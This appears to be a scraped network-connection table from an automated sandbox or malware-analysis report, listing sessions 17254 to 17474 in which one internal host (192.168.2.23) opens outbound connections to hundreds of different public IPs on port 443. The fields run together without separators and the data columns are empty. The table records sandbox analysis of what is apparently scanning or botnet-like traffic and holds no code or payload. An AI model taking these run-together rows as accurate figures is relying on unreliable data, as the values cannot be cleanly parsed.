                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17254192.168.2.235326846.254.114.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17255192.168.2.2359850217.131.19.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17256192.168.2.2337578104.140.95.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17257192.168.2.2355026141.206.6.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17258192.168.2.2355240163.210.195.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17259192.168.2.2335768186.153.103.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17260192.168.2.234347827.164.186.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17261192.168.2.2355998181.240.113.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17262192.168.2.2345134113.75.30.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17263192.168.2.2340858150.210.61.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17264192.168.2.233785294.239.197.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17265192.168.2.2354384150.203.84.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17266192.168.2.2356238115.95.98.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17267192.168.2.2336380134.22.218.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17268192.168.2.235746241.66.102.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17269192.168.2.2351316197.123.36.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17270192.168.2.235994298.216.131.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17271192.168.2.2350244126.241.50.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17272192.168.2.2333342149.155.242.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17273192.168.2.234886835.208.221.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17274192.168.2.2353718123.103.68.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17275192.168.2.233848271.108.14.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17276192.168.2.235870442.148.187.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17277192.168.2.234963624.162.31.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17278192.168.2.2358818115.197.177.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17279192.168.2.2342648203.191.232.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17280192.168.2.2341832168.123.26.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17281192.168.2.2356388142.224.144.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17282192.168.2.2358938185.118.43.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17283192.168.2.235852243.213.90.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17284192.168.2.2355504162.152.252.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17285192.168.2.235986050.16.139.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17286192.168.2.2351232185.134.22.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17287192.168.2.234501850.38.125.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17288192.168.2.235059645.92.57.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17289192.168.2.2360830193.130.55.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17290192.168.2.2338456148.155.251.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17291192.168.2.234975693.116.49.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17292192.168.2.2334812160.174.96.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17293192.168.2.234076452.20.240.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17294192.168.2.2344982178.207.220.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17295192.168.2.2346810184.212.203.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17296192.168.2.2347414106.23.255.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17297192.168.2.2339130110.55.196.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17298192.168.2.23498242.13.47.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17299192.168.2.2341878130.176.62.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17300192.168.2.2353138223.92.131.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17301192.168.2.2356464153.205.64.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17302192.168.2.2346562102.68.95.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17303192.168.2.2354532195.215.155.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17304192.168.2.235616235.144.177.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17305192.168.2.2344438132.213.235.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17306192.168.2.2357692159.235.16.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17307192.168.2.2357264200.191.143.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17308192.168.2.2346894212.146.7.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17309192.168.2.2358560219.55.91.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17310192.168.2.23334922.179.226.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17311192.168.2.2360412151.13.107.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17312192.168.2.233727858.73.100.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17313192.168.2.2359648177.191.193.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17314192.168.2.2346740143.162.103.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17315192.168.2.235823488.166.82.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17316192.168.2.235563048.160.167.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17317192.168.2.2351308205.136.24.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17318192.168.2.233614058.133.230.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17319192.168.2.2341420202.25.195.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17320192.168.2.2339512161.225.237.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17321192.168.2.234865099.242.168.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17322192.168.2.2344622210.87.86.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17323192.168.2.2342334118.213.251.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17324192.168.2.234994247.171.188.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17325192.168.2.2349594202.60.186.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17326192.168.2.2345652143.233.213.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17327192.168.2.2353310102.159.13.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17328192.168.2.2340624216.69.40.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17329192.168.2.236091240.38.83.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17330192.168.2.2348744151.48.108.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17331192.168.2.2356358168.81.139.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17332192.168.2.234695635.63.64.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17333192.168.2.23335861.78.76.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17334192.168.2.2342922123.84.70.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17335192.168.2.233822637.71.251.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17336192.168.2.236091444.204.68.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17337192.168.2.2358344205.55.78.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17338192.168.2.2334684160.198.45.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17339192.168.2.2346342112.155.176.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17340192.168.2.235253888.1.116.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17341192.168.2.2357240152.174.58.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17342192.168.2.235982834.48.132.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17343192.168.2.235999498.204.237.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17344192.168.2.2333824191.75.95.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17345192.168.2.2335934161.174.164.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17346192.168.2.2339286147.179.59.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17347192.168.2.2339090109.99.71.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17348192.168.2.2357104221.195.227.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17349192.168.2.2351320142.177.233.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17350192.168.2.2352966123.47.200.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17351192.168.2.2353724128.203.4.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17352192.168.2.235264868.166.164.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17353192.168.2.235876636.120.63.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17354192.168.2.235677244.67.14.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17355192.168.2.2353260177.135.249.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17356192.168.2.234732249.26.249.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17357192.168.2.2340798207.60.3.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17358192.168.2.234219485.251.116.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17359192.168.2.2333328171.37.32.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17360192.168.2.235814870.71.200.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17361192.168.2.2337370131.1.255.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17362192.168.2.234115252.145.166.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17363192.168.2.2348488186.110.216.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17364192.168.2.2335576151.206.221.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17365192.168.2.234345059.1.252.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17366192.168.2.235740024.88.179.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17367192.168.2.2342802125.53.100.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17368192.168.2.2358050144.137.166.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17369192.168.2.2339134186.127.235.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17370192.168.2.2350408192.254.217.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17371192.168.2.235540661.151.145.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17372192.168.2.2333100178.55.1.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17373192.168.2.2340156101.3.28.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17374192.168.2.2343424164.196.22.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17375192.168.2.2349252126.71.124.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17376192.168.2.2336830115.140.142.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17377192.168.2.233337669.162.54.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17378192.168.2.233714620.172.202.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17379192.168.2.233736683.90.42.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17380192.168.2.233592261.176.197.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17381192.168.2.2351810148.62.244.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17382192.168.2.2337766222.170.212.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17383192.168.2.233604087.71.46.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17384192.168.2.233316293.17.196.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17385192.168.2.233496266.34.54.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17386192.168.2.234122873.195.108.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17387192.168.2.233350435.109.129.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17388192.168.2.2337354146.145.202.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17389192.168.2.2350078195.79.41.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17390192.168.2.23437661.152.40.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17391192.168.2.235403477.109.64.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17392192.168.2.233408037.214.61.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17393192.168.2.2338520150.29.49.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17394192.168.2.2334214193.2.225.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17395192.168.2.2336354115.66.109.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17396192.168.2.235596675.16.209.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17397192.168.2.2352948194.35.166.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17398192.168.2.2339752123.169.21.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17399192.168.2.233954238.97.115.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17400192.168.2.2357770196.25.140.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17401192.168.2.2339060138.193.218.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17402192.168.2.235979017.136.31.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17403192.168.2.2356772210.70.78.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17404192.168.2.2346592182.243.166.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17405192.168.2.235614435.94.219.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17406192.168.2.234769090.12.189.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17407192.168.2.235825837.20.190.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17408192.168.2.233882854.165.1.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17409192.168.2.2336020110.17.118.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17410192.168.2.233455871.222.108.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17411192.168.2.2342912186.140.53.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17412192.168.2.2356058122.225.52.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17413192.168.2.2357720187.72.42.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17414192.168.2.234000240.66.30.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17415192.168.2.23416529.126.230.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17416192.168.2.2349840122.232.189.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17417192.168.2.2349742144.217.112.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17418192.168.2.2346862177.176.120.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17419192.168.2.2343752201.37.197.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17420192.168.2.234492896.206.80.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17421192.168.2.235365478.245.56.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17422192.168.2.2337048133.3.136.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17423192.168.2.2343260130.14.228.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17424192.168.2.23360901.133.30.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17425192.168.2.235168052.253.87.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17426192.168.2.2354130164.139.17.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17427192.168.2.2348690202.141.171.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17428192.168.2.2350940110.137.214.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17429192.168.2.2344070105.155.33.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17430192.168.2.233894820.138.247.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17431192.168.2.2336046186.165.19.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17432192.168.2.2356212138.144.132.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17433192.168.2.234460645.18.161.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17434192.168.2.235378834.206.135.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17435192.168.2.235604847.84.187.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17436192.168.2.2350286110.160.6.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17437192.168.2.233606618.224.105.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17438192.168.2.2335408169.149.85.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17439192.168.2.234272081.85.251.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17440192.168.2.2349750152.106.23.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17441192.168.2.2350442100.130.116.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17442192.168.2.233309835.235.58.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17443192.168.2.2359334170.130.31.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17444192.168.2.235791635.130.4.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17445192.168.2.2339450167.78.86.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17446192.168.2.233866677.1.115.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17447192.168.2.2352544207.56.7.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17448192.168.2.2344774222.251.140.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17449192.168.2.236074223.172.156.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17450192.168.2.234764051.246.199.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17451192.168.2.235416243.42.220.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17452192.168.2.233848217.254.51.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17453192.168.2.233504047.18.119.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17454192.168.2.2334226195.1.161.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17455192.168.2.2340290126.120.193.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17456192.168.2.235183876.23.92.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17457192.168.2.2360514131.79.19.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17458192.168.2.234110649.253.33.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17459192.168.2.2358322108.132.255.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17460192.168.2.2346488103.75.187.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17461192.168.2.2352974221.148.186.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17462192.168.2.2336528201.10.149.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17463192.168.2.235411473.139.121.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17464192.168.2.233284071.24.224.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17465192.168.2.2353828169.41.19.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17466192.168.2.2360228167.152.36.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17467192.168.2.2350834186.52.21.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17468192.168.2.235643098.251.198.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17469192.168.2.234199642.38.139.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17470192.168.2.2336468135.215.63.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17471192.168.2.233440868.72.134.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17472192.168.2.2338532164.87.51.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17473192.168.2.2348802160.165.29.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17474192.168.2.235730831.124.58.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
